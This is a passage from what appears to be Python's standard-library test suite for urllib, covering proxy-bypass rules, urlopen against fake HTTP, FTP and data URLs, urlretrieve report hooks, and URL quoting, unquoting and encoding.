self.env.unset('HTTP_PROXY')
def test_proxy_bypass_environment_host_match(self):
bypass = urllib.request.proxy_bypass_environment
self.env.set('NO_PROXY',
'localhost, anotherdomain.com, newdomain.com:1234, .d.o.t')
self.assertTrue(bypass('localhost'))
self.assertTrue(bypass('LocalHost')) # MixedCase
self.assertTrue(bypass('LOCALHOST')) # UPPERCASE
self.assertTrue(bypass('newdomain.com:1234'))
self.assertTrue(bypass('foo.d.o.t')) # issue 29142
self.assertTrue(bypass('anotherdomain.com:8888'))
self.assertTrue(bypass('www.newdomain.com:1234'))
self.assertFalse(bypass('prelocalhost'))
self.assertFalse(bypass('newdomain.com')) # no port
self.assertFalse(bypass('newdomain.com:1235')) # wrong port
class ProxyTests_withOrderedEnv(unittest.TestCase):
def setUp(self):
# We need to test conditions, where variable order _is_ significant
self._saved_env = os.environ
# Monkey patch os.environ, start with empty fake environment
os.environ = collections.OrderedDict()
def tearDown(self):
os.environ = self._saved_env
def test_getproxies_environment_prefer_lowercase(self):
# Test lowercase preference with removal
os.environ['no_proxy'] = ''
os.environ['No_Proxy'] = 'localhost'
self.assertFalse(urllib.request.proxy_bypass_environment('localhost'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
os.environ['http_proxy'] = ''
os.environ['HTTP_PROXY'] = 'http://somewhere:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual({}, proxies)
# Test lowercase preference of proxy bypass and correct matching including ports
os.environ['no_proxy'] = 'localhost, noproxy.com, my.proxy:1234'
os.environ['No_Proxy'] = 'xyz.com'
self.assertTrue(urllib.request.proxy_bypass_environment('localhost'))
self.assertTrue(urllib.request.proxy_bypass_environment('noproxy.com:5678'))
self.assertTrue(urllib.request.proxy_bypass_environment('my.proxy:1234'))
self.assertFalse(urllib.request.proxy_bypass_environment('my.proxy'))
self.assertFalse(urllib.request.proxy_bypass_environment('arbitrary'))
# Test lowercase preference with replacement
os.environ['http_proxy'] = 'http://somewhere:3128'
os.environ['Http_Proxy'] = 'http://somewhereelse:3128'
proxies = urllib.request.getproxies_environment()
self.assertEqual('http://somewhere:3128', proxies['http'])
class urlopen_HttpTests(unittest.TestCase, FakeHTTPMixin, FakeFTPMixin):
"""Test urlopen() opening a fake http connection."""
def check_read(self, ver):
self.fakehttp(b"HTTP/" + ver + b" 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_url_fragment(self):
# Issue #11703: geturl() omits fragments in the original URL.
url = 'http://docs.python.org/library/urllib.html#OK'
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
fp = urllib.request.urlopen(url)
self.assertEqual(fp.geturl(), url)
finally:
self.unfakehttp()
def test_willclose(self):
self.fakehttp(b"HTTP/1.1 200 OK\r\n\r\nHello!")
try:
resp = urlopen("http://www.python.org")
self.assertTrue(resp.fp.will_close)
finally:
self.unfakehttp()
def test_read_0_9(self):
# "0.9" response accepted (but not "simple responses" without
# a status line)
self.check_read(b"0.9")
def test_read_1_0(self):
self.check_read(b"1.0")
def test_read_1_1(self):
self.check_read(b"1.1")
def test_read_bogus(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 401 Authentication Required
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
self.assertRaises(OSError, urlopen, "http://python.org/")
finally:
self.unfakehttp()
def test_invalid_redirect(self):
# urlopen() should raise OSError for many error codes.
self.fakehttp(b'''HTTP/1.1 302 Found
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Location: file://guidocomputer.athome.com:/python/license
Connection: close
Content-Type: text/html; charset=iso-8859-1
''')
try:
msg = "Redirection to url 'file:"
with self.assertRaisesRegex(urllib.error.HTTPError, msg):
urlopen("http://python.org/")
finally:
self.unfakehttp()
def test_redirect_limit_independent(self):
# Ticket #12923: make sure independent requests each use their
# own retry limit.
for i in range(FancyURLopener().maxtries):
self.fakehttp(b'''HTTP/1.1 302 Found
Location: file://guidocomputer.athome.com:/python/license
Connection: close
''')
try:
self.assertRaises(urllib.error.HTTPError, urlopen,
"http://something")
finally:
self.unfakehttp()
def test_empty_socket(self):
# urlopen() raises OSError if the underlying socket does not send any
# data. (#1680230)
self.fakehttp(b'')
try:
self.assertRaises(OSError, urlopen, "http://something")
finally:
self.unfakehttp()
def test_missing_localfile(self):
# Test for #10836
with self.assertRaises(urllib.error.URLError) as e:
urlopen('file://localhost/a/file/which/doesnot/exists.py')
self.assertTrue(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_file_notexists(self):
fd, tmp_file = tempfile.mkstemp()
tmp_fileurl = 'file://localhost/' + tmp_file.replace(os.path.sep, '/')
try:
self.assertTrue(os.path.exists(tmp_file))
with urlopen(tmp_fileurl) as fobj:
self.assertTrue(fobj)
finally:
os.close(fd)
os.unlink(tmp_file)
self.assertFalse(os.path.exists(tmp_file))
with self.assertRaises(urllib.error.URLError):
urlopen(tmp_fileurl)
def test_ftp_nohost(self):
test_ftp_url = 'ftp:///path'
with self.assertRaises(urllib.error.URLError) as e:
urlopen(test_ftp_url)
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
def test_ftp_nonexisting(self):
with self.assertRaises(urllib.error.URLError) as e:
urlopen('ftp://localhost/a/file/which/doesnot/exists.py')
self.assertFalse(e.exception.filename)
self.assertTrue(e.exception.reason)
@patch.object(urllib.request, 'MAXFTPCACHE', 0)
def test_ftp_cache_pruning(self):
self.fakeftp()
try:
urllib.request.ftpcache['test'] = urllib.request.ftpwrapper('user', 'pass', 'localhost', 21, [])
urlopen('ftp://localhost')
finally:
self.unfakeftp()
def test_userpass_inurl(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
fp = urlopen("http://user:pass@python.org/")
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
self.assertEqual(fp.geturl(), 'http://user:pass@python.org/')
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_userpass_inurl_w_spaces(self):
self.fakehttp(b"HTTP/1.0 200 OK\r\n\r\nHello!")
try:
userpass = "a b:c d"
url = "http://{}@python.org/".format(userpass)
fakehttp_wrapper = http.client.HTTPConnection
authorization = ("Authorization: Basic %s\r\n" %
b64encode(userpass.encode("ASCII")).decode("ASCII"))
fp = urlopen(url)
# The authorization header must be in place
self.assertIn(authorization, fakehttp_wrapper.buf.decode("UTF-8"))
self.assertEqual(fp.readline(), b"Hello!")
self.assertEqual(fp.readline(), b"")
# the spaces are quoted in URL so no match
self.assertNotEqual(fp.geturl(), url)
self.assertEqual(fp.getcode(), 200)
finally:
self.unfakehttp()
def test_URLopener_deprecation(self):
with support.check_warnings(('',DeprecationWarning)):
urllib.request.URLopener()
@unittest.skipUnless(ssl, "ssl module required")
def test_cafile_and_context(self):
context = ssl.create_default_context()
with support.check_warnings(('', DeprecationWarning)):
with self.assertRaises(ValueError):
urllib.request.urlopen(
"https://localhost", cafile="/nonexistent/path", context=context
)
class urlopen_DataTests(unittest.TestCase):
"""Test urlopen() opening a data URL."""
def setUp(self):
# text containing URL special- and unicode-characters
self.text = "test data URLs :;,%=& \u00f6 \u00c4 "
# 2x1 pixel RGB PNG image with one black and one white pixel
self.image = (
b'\x89PNG\r\n\x1a\n\x00\x00\x00\rIHDR\x00\x00\x00\x02\x00\x00\x00'
b'\x01\x08\x02\x00\x00\x00{@\xe8\xdd\x00\x00\x00\x01sRGB\x00\xae'
b'\xce\x1c\xe9\x00\x00\x00\x0fIDAT\x08\xd7c```\xf8\xff\xff?\x00'
b'\x06\x01\x02\xfe\no/\x1e\x00\x00\x00\x00IEND\xaeB`\x82')
self.text_url = (
"data:text/plain;charset=UTF-8,test%20data%20URLs%20%3A%3B%2C%25%3"
"D%26%20%C3%B6%20%C3%84%20")
self.text_url_base64 = (
"data:text/plain;charset=ISO-8859-1;base64,dGVzdCBkYXRhIFVSTHMgOjs"
"sJT0mIPYgxCA%3D")
# base64 encoded data URL that contains ignorable spaces,
# such as "\n", " ", "%0A", and "%20".
self.image_url = (
"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAIAAAABCAIAAAB7\n"
"QOjdAAAAAXNSR0IArs4c6QAAAA9JREFUCNdj%0AYGBg%2BP//PwAGAQL%2BCm8 "
"vHgAAAABJRU5ErkJggg%3D%3D%0A%20")
self.text_url_resp = urllib.request.urlopen(self.text_url)
self.text_url_base64_resp = urllib.request.urlopen(
self.text_url_base64)
self.image_url_resp = urllib.request.urlopen(self.image_url)
def test_interface(self):
# Make sure object returned by urlopen() has the specified methods
for attr in ("read", "readline", "readlines",
"close", "info", "geturl", "getcode", "__iter__"):
self.assertTrue(hasattr(self.text_url_resp, attr),
"object returned by urlopen() lacks %s attribute" %
attr)
def test_info(self):
self.assertIsInstance(self.text_url_resp.info(), email.message.Message)
self.assertEqual(self.text_url_base64_resp.info().get_params(),
[('text/plain', ''), ('charset', 'ISO-8859-1')])
self.assertEqual(self.image_url_resp.info()['content-length'],
str(len(self.image)))
self.assertEqual(urllib.request.urlopen("data:,").info().get_params(),
[('text/plain', ''), ('charset', 'US-ASCII')])
def test_geturl(self):
self.assertEqual(self.text_url_resp.geturl(), self.text_url)
self.assertEqual(self.text_url_base64_resp.geturl(),
self.text_url_base64)
self.assertEqual(self.image_url_resp.geturl(), self.image_url)
def test_read_text(self):
self.assertEqual(self.text_url_resp.read().decode(
dict(self.text_url_resp.info().get_params())['charset']), self.text)
def test_read_text_base64(self):
self.assertEqual(self.text_url_base64_resp.read().decode(
dict(self.text_url_base64_resp.info().get_params())['charset']),
self.text)
def test_read_image(self):
self.assertEqual(self.image_url_resp.read(), self.image)
def test_missing_comma(self):
self.assertRaises(ValueError,urllib.request.urlopen,'data:text/plain')
def test_invalid_base64_data(self):
# missing padding character
self.assertRaises(ValueError,urllib.request.urlopen,'data:;base64,Cg=')
class urlretrieve_FileTests(unittest.TestCase):
"""Test urllib.urlretrieve() on local files"""
def setUp(self):
# Create a list of temporary files. Each item in the list is a file
# name (absolute path or relative to the current working directory).
# All files in this list will be deleted in the tearDown method. Note,
# this only helps to make sure temporary files get deleted, but it
# does nothing about trying to close files that may still be open. It
# is the responsibility of the developer to properly close files even
# when exceptional conditions occur.
self.tempFiles = []
# Create a temporary file.
self.registerFileForCleanUp(support.TESTFN)
self.text = b'testing urllib.urlretrieve'
try:
FILE = open(support.TESTFN, 'wb')
FILE.write(self.text)
FILE.close()
finally:
try: FILE.close()
except: pass
def tearDown(self):
# Delete the temporary files.
for each in self.tempFiles:
try: os.remove(each)
except: pass
def constructLocalFileUrl(self, filePath):
filePath = os.path.abspath(filePath)
try:
filePath.encode("utf-8")
except UnicodeEncodeError:
raise unittest.SkipTest("filePath is not encodable to utf8")
return "file://%s" % urllib.request.pathname2url(filePath)
def createNewTempFile(self, data=b""):
"""Creates a new temporary file containing the specified data,
registers the file for deletion during the test fixture tear down, and
returns the absolute path of the file."""
newFd, newFilePath = tempfile.mkstemp()
try:
self.registerFileForCleanUp(newFilePath)
newFile = os.fdopen(newFd, "wb")
newFile.write(data)
newFile.close()
finally:
try: newFile.close()
except: pass
return newFilePath
def registerFileForCleanUp(self, fileName):
self.tempFiles.append(fileName)
def test_basic(self):
# Make sure that a local file just gets its own location returned and
# a headers value is returned.
result = urllib.request.urlretrieve("file:%s" % support.TESTFN)
self.assertEqual(result[0], support.TESTFN)
self.assertIsInstance(result[1], email.message.Message,
"did not get an email.message.Message instance "
"as second returned value")
def test_copy(self):
# Test that setting the filename argument works.
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
result = urllib.request.urlretrieve(self.constructLocalFileUrl(
support.TESTFN), second_temp)
self.assertEqual(second_temp, result[0])
self.assertTrue(os.path.exists(second_temp), "copy of the file was not "
"made")
FILE = open(second_temp, 'rb')
try:
text = FILE.read()
FILE.close()
finally:
try: FILE.close()
except: pass
self.assertEqual(self.text, text)
def test_reporthook(self):
# Make sure that the reporthook works.
def hooktester(block_count, block_read_size, file_size, count_holder=[0]):
self.assertIsInstance(block_count, int)
self.assertIsInstance(block_read_size, int)
self.assertIsInstance(file_size, int)
self.assertEqual(block_count, count_holder[0])
count_holder[0] = count_holder[0] + 1
second_temp = "%s.2" % support.TESTFN
self.registerFileForCleanUp(second_temp)
urllib.request.urlretrieve(
self.constructLocalFileUrl(support.TESTFN),
second_temp, hooktester)
def test_reporthook_0_bytes(self):
# Test on zero length file. Should call reporthook only 1 time.
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile()
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 1)
self.assertEqual(report[0][2], 0)
def test_reporthook_5_bytes(self):
# Test on 5 byte file. Should call reporthook only 2 times (once when
# the "network connection" is established and once when the block is
# read).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 5)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 2)
self.assertEqual(report[0][2], 5)
self.assertEqual(report[1][2], 5)
def test_reporthook_8193_bytes(self):
# Test on 8193 byte file. Should call reporthook only 3 times (once
# when the "network connection" is established, once for the next 8192
# bytes, and once for the last byte).
report = []
def hooktester(block_count, block_read_size, file_size, _report=report):
_report.append((block_count, block_read_size, file_size))
srcFileName = self.createNewTempFile(b"x" * 8193)
urllib.request.urlretrieve(self.constructLocalFileUrl(srcFileName),
support.TESTFN, hooktester)
self.assertEqual(len(report), 3)
self.assertEqual(report[0][2], 8193)
self.assertEqual(report[0][1], 8192)
self.assertEqual(report[1][1], 8192)
self.assertEqual(report[2][1], 8192)
class urlretrieve_HttpTests(unittest.TestCase, FakeHTTPMixin):
"""Test urllib.urlretrieve() using fake http connections"""
def test_short_content_raises_ContentTooShortError(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
def _reporthook(par1, par2, par3):
pass
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/',
reporthook=_reporthook)
finally:
self.unfakehttp()
def test_short_content_raises_ContentTooShortError_without_reporthook(self):
self.fakehttp(b'''HTTP/1.1 200 OK
Date: Wed, 02 Jan 2008 03:03:54 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_ssl/2.8.22 OpenSSL/0.9.7e
Connection: close
Content-Length: 100
Content-Type: text/html; charset=iso-8859-1
FF
''')
with self.assertRaises(urllib.error.ContentTooShortError):
try:
urllib.request.urlretrieve('http://example.com/')
finally:
self.unfakehttp()
class QuotingTests(unittest.TestCase):
r"""Tests for urllib.quote() and urllib.quote_plus()
According to RFC 3986 (Uniform Resource Identifiers), to escape a
character you write it as '%' + <2 character US-ASCII hex value>.
The Python code of ``'%' + hex(ord(<character>))[2:]`` escapes a
character properly. Case does not matter on the hex letters.
The various character sets specified are:
Reserved characters : ";/?:@&=+$,"
Have special meaning in URIs and must be escaped if not being used for
their special meaning
Data characters : letters, digits, and "-_.!~*'()"
Unreserved and do not need to be escaped; can be, though, if desired
Control characters : 0x00 - 0x1F, 0x7F
Have no use in URIs so must be escaped
space : 0x20
Must be escaped
Delimiters : '<>#%"'
Must be escaped
Unwise : "{}|\^[]`"
Must be escaped
"""
def test_never_quote(self):
# Make sure quote() does not quote letters, digits, and "_,.-"
do_not_quote = ''.join(["ABCDEFGHIJKLMNOPQRSTUVWXYZ",
"abcdefghijklmnopqrstuvwxyz",
"0123456789",
"_.-~"])
result = urllib.parse.quote(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote(): %r != %r" % (do_not_quote, result))
result = urllib.parse.quote_plus(do_not_quote)
self.assertEqual(do_not_quote, result,
"using quote_plus(): %r != %r" % (do_not_quote, result))
def test_default_safe(self):
# Test '/' is default value for 'safe' parameter
self.assertEqual(urllib.parse.quote.__defaults__[0], '/')
def test_safe(self):
# Test setting 'safe' parameter does what it should do
quote_by_default = "<>"
result = urllib.parse.quote(quote_by_default, safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
result = urllib.parse.quote_plus(quote_by_default,
safe=quote_by_default)
self.assertEqual(quote_by_default, result,
"using quote_plus(): %r != %r" %
(quote_by_default, result))
# Safe expressed as bytes rather than str
result = urllib.parse.quote(quote_by_default, safe=b"<>")
self.assertEqual(quote_by_default, result,
"using quote(): %r != %r" % (quote_by_default, result))
# "Safe" non-ASCII characters should have no effect
# (Since URIs are not allowed to have non-ASCII characters)
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
# Same as above, but using a bytes rather than str
result = urllib.parse.quote("a\xfcb", encoding="latin-1", safe=b"\xfc")
expect = urllib.parse.quote("a\xfcb", encoding="latin-1", safe="")
self.assertEqual(expect, result,
"using quote(): %r != %r" %
(expect, result))
def test_default_quoting(self):
# Make sure all characters that should be quoted are by default sans
# space (separate test for that).
should_quote = [chr(num) for num in range(32)] # For 0x00 - 0x1F
should_quote.append(r'<>#%"{}|\^[]`')
should_quote.append(chr(127)) # For 0x7F
should_quote = ''.join(should_quote)
for char in should_quote:
result = urllib.parse.quote(char)
self.assertEqual(hexescape(char), result,
"using quote(): "
"%s should be escaped to %s, not %s" %
(char, hexescape(char), result))
result = urllib.parse.quote_plus(char)
self.assertEqual(hexescape(char), result,
"using quote_plus(): "
"%s should be escapes to %s, not %s" %
(char, hexescape(char), result))
del should_quote
partial_quote = "ab[]cd"
expected = "ab%5B%5Dcd"
result = urllib.parse.quote(partial_quote)
self.assertEqual(expected, result,
"using quote(): %r != %r" % (expected, result))
result = urllib.parse.quote_plus(partial_quote)
self.assertEqual(expected, result,
"using quote_plus(): %r != %r" % (expected, result))
def test_quoting_space(self):
# Make sure quote() and quote_plus() handle spaces as specified in
# their unique way
result = urllib.parse.quote(' ')
self.assertEqual(result, hexescape(' '),
"using quote(): %r != %r" % (result, hexescape(' ')))
result = urllib.parse.quote_plus(' ')
self.assertEqual(result, '+',
"using quote_plus(): %r != +" % result)
given = "a b cd e f"
expect = given.replace(' ', hexescape(' '))
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
expect = given.replace(' ', '+')
result = urllib.parse.quote_plus(given)
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
def test_quoting_plus(self):
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma'),
'alpha%2Bbeta+gamma')
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', '+'),
'alpha+beta+gamma')
# Test with bytes
self.assertEqual(urllib.parse.quote_plus(b'alpha+beta gamma'),
'alpha%2Bbeta+gamma')
# Test with safe bytes
self.assertEqual(urllib.parse.quote_plus('alpha+beta gamma', b'+'),
'alpha+beta+gamma')
def test_quote_bytes(self):
# Bytes should quote directly to percent-encoded values
given = b"\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Encoding argument should raise type error on bytes input
self.assertRaises(TypeError, urllib.parse.quote, given,
encoding="latin-1")
# quote_from_bytes should work the same
result = urllib.parse.quote_from_bytes(given)
self.assertEqual(expect, result,
"using quote_from_bytes(): %r != %r"
% (expect, result))
def test_quote_with_unicode(self):
# Characters in Latin-1 range, encoded by default in UTF-8
given = "\xa2\xd8ab\xff"
expect = "%C2%A2%C3%98ab%C3%BF"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with None (default)
result = urllib.parse.quote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in Latin-1 range, encoded with Latin-1
given = "\xa2\xd8ab\xff"
expect = "%A2%D8ab%FF"
result = urllib.parse.quote(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded by default in UTF-8
given = "\u6f22\u5b57" # "Kanji"
expect = "%E6%BC%A2%E5%AD%97"
result = urllib.parse.quote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with Latin-1
given = "\u6f22\u5b57"
self.assertRaises(UnicodeEncodeError, urllib.parse.quote, given,
encoding="latin-1")
# Characters in BMP, encoded with Latin-1, with replace error handling
given = "\u6f22\u5b57"
expect = "%3F%3F" # "??"
result = urllib.parse.quote(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
# Characters in BMP, Latin-1, with xmlcharref error handling
given = "\u6f22\u5b57"
expect = "%26%2328450%3B%26%2323383%3B" # "漢字"
result = urllib.parse.quote(given, encoding="latin-1",
errors="xmlcharrefreplace")
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
def test_quote_plus_with_unicode(self):
# Encoding (latin-1) test for quote_plus
given = "\xa2\xd8 \xff"
expect = "%A2%D8+%FF"
result = urllib.parse.quote_plus(given, encoding="latin-1")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
# Errors test for quote_plus
given = "ab\u6f22\u5b57 cd"
expect = "ab%3F%3F+cd"
result = urllib.parse.quote_plus(given, encoding="latin-1",
errors="replace")
self.assertEqual(expect, result,
"using quote_plus(): %r != %r" % (expect, result))
class UnquotingTests(unittest.TestCase):
"""Tests for unquote() and unquote_plus()
See the docstring for QuotingTests for details on quoting and such.
"""
def test_unquoting(self):
# Make sure unquoting of all ASCII values works
escape_list = []
for num in range(128):
given = hexescape(chr(num))
expect = chr(num)
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" %
(expect, result))
escape_list.append(given)
escape_string = ''.join(escape_list)
del escape_list
result = urllib.parse.unquote(escape_string)
self.assertEqual(result.count('%'), 1,
"using unquote(): not all characters escaped: "
"%s" % result)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, ())
with support.check_warnings(('', BytesWarning), quiet=True):
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote, b'')
def test_unquoting_badpercent(self):
# Test unquoting on bad percent-escapes
given = '%xab'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%x'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
given = '%'
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result, "using unquote(): %r != %r"
% (expect, result))
# unquote_to_bytes
given = '%xab'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%x'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
given = '%'
expect = bytes(given, 'ascii')
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result, "using unquote_to_bytes(): %r != %r"
% (expect, result))
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, None)
self.assertRaises((TypeError, AttributeError), urllib.parse.unquote_to_bytes, ())
def test_unquoting_mixed_case(self):
# Test unquoting on mixed-case hex digits in the percent-escapes
given = '%Ab%eA'
expect = b'\xab\xea'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquoting_parts(self):
# Make sure unquoting works when non-quoted characters are
# interspersed
given = 'ab%sd' % hexescape('c')
expect = "abcd"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using quote(): %r != %r" % (expect, result))
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquoting_plus(self):
# Test difference between unquote() and unquote_plus()
given = "are+there+spaces..."
expect = given
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
expect = given.replace('+', ' ')
result = urllib.parse.unquote_plus(given)
self.assertEqual(expect, result,
"using unquote_plus(): %r != %r" % (expect, result))
def test_unquote_to_bytes(self):
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = b'br\xc3\xbcckner_sapporo_20050930.doc'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test on a string with unescaped non-ASCII characters
# (Technically an invalid URI; expect those characters to be UTF-8
# encoded).
result = urllib.parse.unquote_to_bytes("\u6f22%C3%BC")
expect = b'\xe6\xbc\xa2\xc3\xbc' # UTF-8 for "\u6f22\u00fc"
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input
given = b'%A2%D8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
# Test with a bytes as input, with unescaped non-ASCII bytes
# (Technically an invalid URI; expect those bytes to be preserved)
given = b'%A2\xd8ab%FF'
expect = b'\xa2\xd8ab\xff'
result = urllib.parse.unquote_to_bytes(given)
self.assertEqual(expect, result,
"using unquote_to_bytes(): %r != %r"
% (expect, result))
def test_unquote_with_unicode(self):
# Characters in the Latin-1 range, encoded with UTF-8
given = 'br%C3%BCckner_sapporo_20050930.doc'
expect = 'br\u00fcckner_sapporo_20050930.doc'
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with None (default)
result = urllib.parse.unquote(given, encoding=None, errors=None)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in the Latin-1 range, encoded with Latin-1
result = urllib.parse.unquote('br%FCckner_sapporo_20050930.doc',
encoding="latin-1")
expect = 'br\u00fcckner_sapporo_20050930.doc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Characters in BMP, encoded with UTF-8
given = "%E6%BC%A2%E5%AD%97"
expect = "\u6f22\u5b57" # "Kanji"
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence
given = "%F3%B1"
expect = "\ufffd" # Replacement character
result = urllib.parse.unquote(given)
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, replace errors
result = urllib.parse.unquote(given, errors="replace")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# Decode with UTF-8, invalid sequence, ignoring errors
given = "%F3%B1"
expect = ""
result = urllib.parse.unquote(given, errors="ignore")
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, UTF-8
result = urllib.parse.unquote("\u6f22%C3%BC")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
# A mix of non-ASCII and percent-encoded characters, Latin-1
# (Note, the string contains non-Latin-1-representable characters)
result = urllib.parse.unquote("\u6f22%FC", encoding="latin-1")
expect = '\u6f22\u00fc'
self.assertEqual(expect, result,
"using unquote(): %r != %r" % (expect, result))
class urlencode_Tests(unittest.TestCase):
"""Tests for urlencode()"""
def help_inputtype(self, given, test_type):
"""Helper method for testing different input types.
'given' must lead to only the pairs:
* 1st, 1
* 2nd, 2
* 3rd, 3
The test cannot assume anything about ordering: the docs make no
guarantee, and dictionary input has no guaranteed order.
"""
expect_somewhere = ["1st=1", "2nd=2", "3rd=3"]
result = urllib.parse.urlencode(given)
for expected in expect_somewhere:
self.assertIn(expected, result,
"testing %s: %s not found in %s" %
(test_type, expected, result))
self.assertEqual(result.count('&'), 2,
"testing %s: expected 2 '&'s; got %s" %
(test_type, result.count('&')))
amp_location = result.index('&')
on_amp_left = result[amp_location - 1]
on_amp_right = result[amp_location + 1]
self.assertTrue(on_amp_left.isdigit() and on_amp_right.isdigit(),
"testing %s: '&' not located in proper place in %s" %
(test_type, result))
self.assertEqual(len(result), (5 * 3) + 2, #5 chars per thing and amps
"testing %s: "
"unexpected number of characters: %s != %s" %
(test_type, len(result), (5 * 3) + 2))
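# Added illustration (not part of the original test suite): the pairs checked
# above would come out of urlencode() roughly like this, modulo ordering:
#     urllib.parse.urlencode({"1st": "1", "2nd": "2", "3rd": "3"})
#     -> '1st=1&2nd=2&3rd=3' (some permutation of these three pairs)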
def test_using_mapping(self):
# Test passing in a mapping object as an argument.
self.help_inputtype({"1st":'1', "2nd":'2', "3rd":'3'},
